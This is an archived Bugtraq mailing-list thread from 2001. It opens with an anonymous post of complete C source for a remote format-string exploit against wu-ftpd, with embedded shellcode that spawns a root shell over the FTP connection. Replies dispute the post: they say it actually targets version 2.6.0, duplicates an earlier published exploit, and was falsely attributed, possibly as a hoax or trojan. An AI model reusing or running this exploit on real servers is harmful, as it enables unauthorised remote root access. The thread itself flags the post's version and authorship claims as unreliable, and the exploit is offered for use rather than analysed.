6185791 2001-03-07 04:40 +0100 /283 rader/ Nomen Nescio <nobody@DIZUM.COM> Sänt av: joel@lysator.liu.se Importerad: 2001-03-07 21:56 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: nobody@DIZUM.COM Mottagare: Bugtraq (import) <15805> Ärende: wu-ftpd ------------------------------------------------------------ From: Nomen Nescio <nobody@DIZUM.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <e01141c29072cd2bc40439162ba87800@dizum.com> hi, this is an exploit for wu-ftpd 2.6.1(1) on linux propz to segv for giving this to me bringin' you the 0day from the hackweiser crew, australian +chapter cya, Till ---- /* * Linux wu-ftpd - 2.6.1(1) * * DiGiT */ #include <sys/socket.h> #include <sys/types.h> #include <stdio.h> #include <netinet/in.h> #include <netdb.h> char linuxcode[] = "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb" "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31" "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27" "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31" "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d" "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46" "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8" "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff" "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31"; main (int argc, char *argv[]) { char cmdbuf[8192]; char cbuf[1024]; char *t; char nop[400]; int pip, i, a = 22, st = 0; struct sockaddr_in sck; struct hostent *hp; long inet; int port = 21; fd_set fds; unsigned int aa; long reta, retb, tmp, retz; int ret; int add = 0; memset (cmdbuf, 0x0, sizeof (cmdbuf)); memset (cbuf, 0x0, sizeof (cbuf)); memset (nop, 0x0, sizeof (nop)); if (argc < 2) { fprintf (stderr, "Usage: %s [ip] \n", argv[0]); exit (-1); } pip = socket (PF_INET, SOCK_STREAM, 0); if (!pip) { perror 
("socket()"); exit (-1); } inet = inet_addr (argv[1]); if (inet == -1) { if (hp = gethostbyname (argv[1])) memcpy (&inet, hp->h_addr, 4); else inet = -1; if (inet == -1) { fprintf (stderr, "Cant resolv %s!! \n", argv[1]); exit (-1); } } sck.sin_family = PF_INET; sck.sin_port = htons (port); sck.sin_addr.s_addr = inet; if (connect (pip, (struct sockaddr *) &sck, sizeof (sck)) < 0) { perror ("Connect() "); exit (-1); } read (pip, cbuf, 1023); fprintf (stderr, "Connected to: %s \n", argv[1]); fprintf (stderr, "Banner: %s \n", cbuf); strcpy (cmdbuf, "user ftp\n"); write (pip, cmdbuf, strlen (cmdbuf)); memset (nop, 0x90, sizeof (nop) - strlen (linuxcode) - 10); strcat (nop, linuxcode); memset (cmdbuf, 0x0, sizeof (cmdbuf)); sprintf (cmdbuf, "pass %s\n", nop); write (pip, cmdbuf, strlen (cmdbuf)); sleep (1); read (pip, cmdbuf, sizeof (cmdbuf) - 1); memset (cmdbuf, 0x0, sizeof (cmdbuf)); if (!strncmp (cmdbuf, "530", 3)) { printf ("loggin incorrect : %s \n", cmdbuf); exit (-1); } fprintf (stderr, "Logged in.. 
\n"); fprintf (stderr, "+ Finding ret addresses \n"); memset (cmdbuf, 0x0, sizeof (cmdbuf)); strcpy (cmdbuf, "SITE EXEC %x %x %x %x +%x |%x\n"); write (pip, cmdbuf, strlen (cmdbuf)); sleep (1); memset (cmdbuf, 0x0, sizeof (cmdbuf)); read (pip, cmdbuf, sizeof (cmdbuf) - 1); if (!strncmp (cmdbuf + 4, "%x", 2)) { fprintf (stderr, "[1m[31mWuftpd is not vulnerable : %s \n[0m", cmdbuf); exit (-1); } else { fprintf (stderr, "[1m[32mWuftpd is vulnerable : %s \n[0m", cmdbuf); } reta = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") + 11, 16); retz = strtoul (strstr (cmdbuf, "+") + 1, strstr (cmdbuf, "|") + 11, 16); memset (cmdbuf, 0x0, sizeof (cmdbuf)); strcpy (cmdbuf, "SITE EXEC "); for (ret = 0; ret <= 88; ret++) { strcat (cmdbuf, "%x"); } strcat (cmdbuf, "|%x\n"); write (pip, cmdbuf, strlen (cmdbuf)); sleep (1); memset (cmdbuf, 0x0, sizeof (cmdbuf)); read (pip, cmdbuf, sizeof (cmdbuf) - 1); retb = strtoul (strstr (cmdbuf, "|") + 1, strstr (cmdbuf, "|") + 11, 16); printf ("Ret location befor: %x \n", reta); if (reta == 0) reta = retz; else add = 600; reta = reta - 0x58; retb = retb + 100 - 0x2569 - add; printf ("Ret location : %x \n", reta); printf ("Proctitle addres : %x and %u \n", retb, retb); sleep (2); memset (cmdbuf, 0x0, sizeof (cmdbuf)); sprintf (cmdbuf, "SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c", (reta & 0x000000ff), (reta & 0x0000ff00) >> 8, (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24); a = 22; memset (cbuf, 0x0, sizeof (cbuf)); while (1) { memset (cmdbuf, 0x0, sizeof (cmdbuf)); sprintf (cmdbuf, "SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c", (reta & 0x000000ff), (reta & 0x0000ff00) >> 8, (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24); for (i = 0; i <= 128; i++) strcat (cmdbuf, "%.f"); for (i = 0; i <= a; i++) strcat (cmdbuf, "%d"); sprintf (cbuf, "|%%x|%%x\n", aa + 9807 - 460); strcat (cmdbuf, cbuf); write (pip, cmdbuf, strlen (cmdbuf)); memset (cmdbuf, 0x0, sizeof (cmdbuf)); read (pip, cmdbuf, sizeof (cmdbuf) - 1); t 
= (char *) strstr (cmdbuf, "|"); tmp = strtoul (t + 1, t + 11, 16); if (tmp != 0) { fprintf (stderr, "tmp 1 : 0x%x\n", tmp); if (tmp == reta) { fprintf (stderr, "Cached a : %d \n", a); st = 1; break; } tmp = strtoul (t + 11, t + 22, 16); fprintf (stderr, "tmp 2 : 0x%x\n", tmp); if (tmp == reta) { fprintf (stderr, "Cached a : %d \n", a); st = 2; break; } } if (st > 0) break; a++; } sleep (1); memset (cmdbuf, 0x0, sizeof (cmdbuf)); memset (cbuf, 0x0, sizeof (cbuf)); sprintf (cmdbuf, "SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\xff%c%c", (reta & 0x000000ff), (reta & 0x0000ff00) >> 8, (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24); for (i = 0; i <= 128; i++) strcat (cmdbuf, "%.f"); if (add != 600) a = a - 1; fprintf (stderr, "Trying with : %d \n", a); for (i = 0; i <= a; i++) strcat (cmdbuf, "%d"); aa = retb; if (add == 600) sprintf (cbuf, "|%%.%ud%%n\n", aa + 9807); else sprintf (cbuf, "|%%.%ud%%n\n", aa + 9807 - 480); strcat (cmdbuf, cbuf); write (pip, cmdbuf, strlen (cmdbuf)); memset (cmdbuf, 0x0, sizeof (cmdbuf)); read (pip, cmdbuf, sizeof (cmdbuf) - 1); memset (cmdbuf, 0x0, sizeof (cmdbuf)); fprintf (stderr, "[1m[33m Wait for a shell.....\n[0m"); while (1) { FD_ZERO (&fds); FD_SET (0, &fds); FD_SET (pip, &fds); select (255, &fds, NULL, NULL, NULL); if (FD_ISSET (pip, &fds)) { memset (cbuf, 0x0, sizeof (cbuf)); ret = read (pip, cbuf, sizeof (cbuf) - 1); if (ret <= 0) { printf ("Connection closed - EOF \n"); exit (-1); } printf ("%s", cbuf); } if (FD_ISSET (0, &fds)) { memset (cbuf, 0x0, sizeof (cbuf)); read (0, cbuf, sizeof (cbuf) - 1); write (pip, cbuf, strlen (cbuf)); } } close (pip); } _______________________________ The Proton <proton@dshs.nsw.edu.au> _______________________________ (6185791) ------------------------------------------ Kommentar i text 6186637 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL> Kommentar i text 6186670 av predator <preedator@SENDMAIL.RU> 6186670 2001-03-07 22:56 +0100 /32 rader/ predator <preedator@SENDMAIL.RU> Sänt 
av: joel@lysator.liu.se Importerad: 2001-03-08 02:35 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: preedator@SENDMAIL.RU Mottagare: Bugtraq (import) <15811> Kommentar till text 6185791 av Nomen Nescio <nobody@DIZUM.COM> Ärende: wu-ftpd ------------------------------------------------------------ From: predator <preedator@SENDMAIL.RU> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <3AA6AE9B.A410DE70@sendmail.ru> Nomen Nescio wrote: > > hi, > > this is an exploit for wu-ftpd 2.6.1(1) on linux > propz to segv for giving this to me > > bringin' you the 0day from the hackweiser crew, australian > +chapter > > cya, > Till > > ---- > > /* > * Linux wu-ftpd - 2.6.1(1) > * > * DiGiT > */ Correct me if I'm wrong, but this is an exploit for wu 2.6.0, not 2.6.1... This format string bug has been fixed in 2.6.1. -- signoff predator (6186670) ------------------------------------------ 6186831 2001-03-07 22:55 +0100 /27 rader/ Jogchem de Groot <c.dgroot@CHELLO.NL> Sänt av: joel@lysator.liu.se Importerad: 2001-03-08 08:03 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: c.dgroot@CHELLO.NL Mottagare: Bugtraq (import) <15815> Ärende: Re: wu2.6.1 exploit ------------------------------------------------------------ From: Jogchem de Groot <c.dgroot@CHELLO.NL> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <01030722554001.00974@kryptology> jogchem@kryptology:~$ diff wu2.6.1.c wu-lnx.c jogchem@kryptology:~$ Exactly the same as the previously released wu-lnx.c exploit. http://packetstorm.securify.com/0009-exploits/wu-lnx.c kinda a hoax?? 
:) On Wednesday 07 March 2001 04:40, you wrote: > hi, > > this is an exploit for wu-ftpd 2.6.1(1) on linux > propz to segv for giving this to me > > bringin' you the 0day from the hackweiser crew, australian > +chapter > > cya, > Till ------------------------------------------------------- (6186831) ------------------------------------------ 6190826 2001-03-07 23:42 -0500 /58 rader/ John <johns@TAMPABAY.RR.COM> Sänt av: joel@lysator.liu.se Importerad: 2001-03-08 20:05 av Brevbäraren (som är implementerad i) Python Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM Externa svar till: johns@TAMPABAY.RR.COM Mottagare: Bugtraq (import) <15821> Kommentar till text 6185791 av Nomen Nescio <nobody@DIZUM.COM> Ärende: Re: Wu 2.6.1 exploit ------------------------------------------------------------ From: John <johns@TAMPABAY.RR.COM> To: BUGTRAQ@SECURITYFOCUS.COM Message-ID: <3AA70DC8.82BF9B1A@tampabay.rr.com> I just posted another message to Bugtraq before I read a post to Anti Security from DiGiT. His comments are below. digit 07.03.01 22:32:22 Subject: wu-ftpd fake on BUGTRAQ Action: REPLY, NEW. Before everyone starts flaming me or antisec about that post to BUGTRAQ about wu-ftpd 2.6.1, you must realize that I did not write that "exploit" which is on bugtraq. In fact, anyone who closely inspects the "exploit" will see that it is actually a fake exploit. However, I can't say for sure whether it is a trojan. This might be an attempt to undermine my credibility with antisec? If so, it would be an extremely cheap shot. 
Nomen Nescio wrote: > > hi, > > this is an exploit for wu-ftpd 2.6.1(1) on linux > propz to segv for giving this to me > > bringin' you the 0day from the hackweiser crew, australian > +chapter > > cya, > Till > > ---- > > /* > * Linux wu-ftpd - 2.6.1(1) > * > * DiGiT > */ > > _______________________________ > The Proton > <proton@dshs.nsw.edu.au> > _______________________________ -- "The events which transpired five thousand years ago; five years ago or five minutes ago, have determined what will happen five minutes from now; five years from now or five thousand years from now. All history is a current event." - Dr John Henrik Clarke - (6190826) --------------------------------(Ombruten)